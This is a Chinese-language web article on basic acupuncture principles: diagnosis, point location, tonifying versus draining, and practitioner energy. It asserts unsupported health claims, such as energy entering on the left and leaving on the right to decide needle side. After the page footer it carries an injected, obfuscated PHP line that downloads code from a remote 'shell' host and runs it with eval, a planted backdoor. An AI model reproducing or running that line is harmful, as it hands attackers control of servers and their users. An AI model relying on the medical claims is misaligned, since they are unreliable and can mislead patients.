收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 針灸治療基本原則
針灸治療基本原則 列印 E-mail

一、診斷要對,取穴要準:
        「診斷要對」,是依所學加上臨床經驗,絕非頭痛扎頭、腳痛扎腳。「取穴要準」乃因中醫古書有云:「寧失其穴,勿失其經」,說來簡單,卻因各家學派與各種書籍寫法各異,造成穴位易看難定。各家都強調「寸分」,其實取穴原則:「不通則痛,通則不痛」,我們可依書本所述穴位大概定點,再「以痛為俞」,自然取穴必準;而後下針,則病痛可解。

前些日子,新聞刊載某國立大學西醫醫學博士候選人竊取一個小學畢業「針灸師」的理論「腳痛扎手,手痛扎腳」。事實上,在針灸的臨床領域中,這是一個非常基本且淺顯的理論,稱之為「下病上取、上病下取」;只是因為臺灣中、西醫的對立,造成中、西醫之間相互的不了解,導致認知嚴重落差。如果臺灣中、西醫能夠整合,相互學習與了解,也就不會鬧這種笑話了。

二、補瀉要正確:
        針灸各派對補瀉說法不一,以能量醫學觀點,人體能量左進右出,因此欲補充能量時為左側,也就是治療虛症,例如:患者手腳冰冷、下腰虛軟、膝蓋無力為腎虛症,應由左側入針;欲瀉出能量為右側,也就是治療實症,例如:婦女白黃帶黏稠為腎實症,則由右側入針。若以「不通則痛」的原則,此時按壓患者三陰交,虛症者必為左側疼痛,實症者必為右側疼痛;偶有例外,則仍以「以痛為俞」來取決左側或右側穴位下針。

當然也有人認為「針」多為瀉,「灸」多為補。但到底為何,見仁見智!一般而言,我們以左側、右側來決定補瀉的原則,以「以痛為俞」的原則再度確認虛實,判斷是否正確,此時下針,效果必佳。由於很多人並不習慣「灸」的那種味道,在密閉的治療空間內也容易影響他人,因此我在臨床上多用「醫學芳香療法」替代「灸」。

三、施針者身體要好、能量要強:
        針灸所使用的金屬針是最容易與患者產生共振的治療工具,因此施針者身體好、能量強,治病效果越顯著;患者的病情愈重,對施針者的影響也就相對愈大。曾有一位醫師對我說:「你還在用針啊!難道你不知道自己會受傷嗎?」這句話令我難過了很久,難道醫師在治病時,腦袋還能想到自己嗎?我想所有的醫師、準醫師都應該再加強醫學倫理課程才是!「醫者父母心」是為醫者永遠要放在心中的一句話。
 

 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));